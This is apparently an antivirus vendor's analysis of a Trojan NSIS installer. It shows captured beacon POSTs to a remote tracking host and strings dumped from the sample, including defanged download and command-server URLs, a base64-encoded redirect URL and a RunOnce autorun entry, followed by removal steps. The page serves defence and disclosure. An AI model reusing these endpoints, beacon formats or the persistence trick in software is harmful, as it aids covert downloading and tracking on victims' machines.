Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:33 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 126
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"tst=&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:33 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Methods: GET,HEAD
,PUT,POST,DELETE..Access-Control-Allow-Origin: *..Content-Type: applic
ation/json; charset=utf-8..Date: Fri, 29 Apr 2016 11:27:33 GMT..Conten
t-Length: 15..Connection: keep-alive..{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 182
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Methods: GET,HEAD
,PUT,POST,DELETE..Access-Control-Allow-Origin: *..Content-Type: applic
ation/json; charset=utf-8..Date: Fri, 29 Apr 2016 11:27:34 GMT..Conten
t-Length: 15..Connection: keep-alive..{"Status":"OK"}..

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_856:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw18.tmp
netc.dll
0732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
Xt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
Software\Microsoft\Windows\CurrentVersion\RunOnce
r.dll
nstall.exe
%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe /runonce
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd3.tmp\inetc.dll
or.dll
OLEAUT32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
IpConfig.dll
zcÁ
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
L%sDL'y
qk.RQk
1ve%s
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw18.tmp
nsw18.tmp
aed3248e8f04ac2affda17.exe
2C7DF~1.EXE
ments and Settings\"%CurrentUserName%"\Application Data\InstallW\Full_Setup.exe /runonce
6-6726-ADB2-5C02-3742FA8A8B37
tNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=
mY2Z2cWc0YVhHfX0=&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
sb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=
1 2 3 4 5 6 7 8 9 10 11
tion Data\InstallW\Full_Setup.exe
tp://data.biphysics.com/r?_=1461929230014&pid=10732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
3 4 5 6 7 8 9 10 11
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw18.tmp
c:\%original file name%.exe
%Documents and Settings%\%current user%\Application Data\InstallW
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd3.tmp
10732314-17
dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=
%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe
)-.Yln
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
1.0.0.0

nsoA.tmp_240:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg16.tmp
360TotalSecurity.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu10.tmp\inetc.dll
hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483
hXXp://download-servers.com/partners/360/360TotalSecurity.exe
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
8!8-8B8I8}8
@.reloc
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
u.Uj@
MSVCRT.dll
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%UXn5
.jL J
#vWeB0,
.qo8KT
kRV%D
>aO.nF
k%UO^
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsb19.tmp
nsb19.tmp
://livestatscounter.com/Generic/vos.php?ch=
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoA.tmp /idn
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg16.tmp
Uninstall.exe
n.php?r=vu_vo2_
mobilitydata5.com/SysInfo/tem.php?sid=83837567483
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoA.tmp /idn
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
nsoA.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoE.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu10.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoA.tmp
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483&v=2\"}"}
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv14.tmp
dlgen.php?r=vu_vo2_
)-.Yln
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
1.0.0.1

nsg16.tmp_1164:

.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
h.hTZ
,T.UV
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
%Program Files%
\System.dll
\nsExec.dll
\INetC.dll
Nullsoft Install System (Unicode) v2.46.5-Unicode
\wininit.ini
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg16.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
nsg16.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx1A.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg16.tmp


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    nsoA.tmp:240
    Full_Setup.exe:1912
    %original file name%.exe:856
    nsg16.tmp:1164

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb19.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\Validate[1].exe (4152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\tJEcW[1] (5952 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu11.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp12.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\vos_n[1].htm (977 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg16.tmp (5952 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsoF.tmp (11755 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv14.tmp (977 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu10.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsdC.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsdB.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss9.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsoA.tmp (7192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss8.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsjD.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn7.tmp (6720 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\t1.dll (4 bytes)
    %Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe (16664 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\0[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb5.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsl17.tmp (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\r[1].htm (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\CAEJCTMN.htm (16664 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw18.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\IpConfig.dll (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\r[1].htm (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Application Data\InstallW\Uninstall.exe (2967 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\CAW1QV4X.htm (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\0[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa13.tmp (43 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (199 bytes)
    %Documents and Settings%\%current user%\Application Data\InstallW\Resume.exe (1425 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq15.tmp (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\0[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\WmiInspector.dll (3616 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn4.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (9120 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "Finalize" = "%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe /runonce"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now